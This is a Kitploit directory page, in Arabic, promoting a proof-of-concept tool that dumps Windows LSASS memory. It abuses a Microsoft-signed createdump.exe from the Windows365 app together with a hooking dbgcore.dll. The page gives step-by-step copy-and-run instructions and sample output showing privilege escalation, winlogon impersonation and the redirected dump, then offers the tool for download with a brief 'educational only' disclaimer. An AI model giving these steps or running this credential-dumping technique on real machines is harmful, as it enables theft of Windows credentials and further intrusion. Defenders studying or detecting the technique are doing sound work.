Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
createdump — استخدم أداة createdump الخاصة بـ WindowsApp للحصول على تفريغ lsass | Kitploit
أدوات/GitHubGitHub/rweijnen/createdump
هجمات كلمات المرورأدوات انتحال الشخصيةما بعد الاستغلالالفريق الأحمر
GitHubrweijnen/createdump

createdump

استخدم أداة createdump الخاصة بـ WindowsApp للحصول على تفريغ lsass

عرض المستودع
151208منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Windows App تفريغ LSASS من تطبيق Windows - إثبات المفهوم

يوضح هذا المشروع كيفية تفريغ عملية LSASS باستخدام أداة createdump.exe، وهي ملف قابل للتنفيذ موقّع من مايكروسوفت، من تطبيق Windows، مع الاستفادة من خطاف (Hook) مخصص لتمكين الوصول إلى عملية LSASS.

root@kitploit:~
Get-AuthentiCodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnc\createdump.exe')

    Directory: C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc

SignerCertificate                         Status                                       StatusMessage                               Path
-----------------                         ------                                       -------------                               ----
C2048FB509F1C37A8C3E9EC6648118458AA01780  Valid                                        Signature verified.                         createdump.exe

كيفية الاستخدام

  1. انسخ createdump من مجلد WindowsApp إلى مجلد من اختيارك (copy C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc\createdump.exe .)
  2. ضع dbgcore.dll من هذا المستودع في نفس المجلد
  3. نفّذ createdump (يمكنك تقديم معاملات اختيارية)

ملاحظة: يتطلب صلاحيات المسؤول (Admin).

يجب أن يكون الناتج مشابهًا لما يلي:

root@kitploit:~
c:\work\_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump

Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:\Users\me\AppData\Local\Temp\dump.35828.dmp
MiniDumpWriteDump called with:
  ProcessId: 35828
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:\Windows\System32\DbgCore.dll
Calling original with:
  ProcessId: 1512
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.

إخلاء مسؤولية

هذا المشروع مخصص للأغراض التعليمية فقط. قد يؤدي إساءة استخدام هذه الأداة إلى انتهاك سياسات الخصوصية والأمان.

تنزيل الأداة